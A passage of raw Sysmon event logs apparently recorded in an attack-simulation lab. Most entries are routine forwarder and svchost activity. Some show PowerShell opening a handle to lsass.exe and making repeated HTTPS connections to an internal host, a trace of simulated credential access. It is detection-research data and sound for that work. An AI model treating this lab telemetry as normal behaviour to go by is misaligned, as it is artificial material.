dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:48.007{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-753B-613B-84B4-03000000C801}5688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:49.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201DE73012503ABB4D5179617B81DF81,SHA256=D57AB5B2BDDC9F2737C9CD006A437A1DF66A3C0804FB6B4F03C50C4877D45751,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:14.862{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52675-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035344421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:15.952{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52676-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035344423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:17.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52677-false10.0.1.12-8000- 23542300x800000000000000035344422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:51.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41D55170E5DA0EDB2051BB3569B30B13,SHA256=63B44ED996736F62E206F4D8230C6634662FB5689FE0FD04F047B92323574392,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:52.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4446A976937C1B57741C5E1FB88C7B7,SHA256=EF9B2CFC4FA3EDB17DB80DE4212AA3E2B4203AF5A6E292A1660C87B1E6886A3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:53.979{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=344C7A081360344BEB6366D819A3349F,SHA256=0AFFF00A3CEFF2807A103B9C94147318896D5AA92C60A916741030884C503A00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:53.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A50AD51CE8C14A6285E80335D8EA8F7,SHA256=2D54A60873AB406C25DDDA6595FAB89227A6DDF19FE81BB534DA4C8EB656CFFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:19.973{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52678-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:54.063{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A76F87F1F763DF67682859EAED3645B0,SHA256=DE14EAF59559A8AF72E8C5BC9ABA85B2621987DBACBBE3FFF20FBAFFAD937CCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:55.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64169273A4E58F187E9B9D04F06FCC28,SHA256=F3B9B715BA58D25D940A8E682D06AFAF81838EA11D7E5292F5203C6206854F6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:22.239{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52679-false10.0.1.12-8000- 23542300x800000000000000035344430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:56.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBE31CBF5E82DF40909AC7D7D695067,SHA256=6790A35B700ADCEEDF3C2390442D18E3A20352D85D5732F5E0D84D0E220366D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:57.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A27A06D4795457D4AC3A78714CAA7BD,SHA256=A82A9E77B63B43089BF4AF3BB7765E09CA039B0A1C11AB7EAFD3AE1E909ABA61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:58.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C75374519BC21DF8D8B36587360D4A0,SHA256=B1DA75AAFC66F15CAAD3499702A7624CE0CA9E8825EC9C6C4EB63C00CB932578,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:24.985{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52680-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000035344465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:09:59.760{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a655-0xec4e191b) 23542300x800000000000000035344464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE6B0CA8B526CD9C5065F0EF1783323F,SHA256=113745142D62CB86D896494CC26C606BECAD44E2B4DEF2D71FCBF020F2427574,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 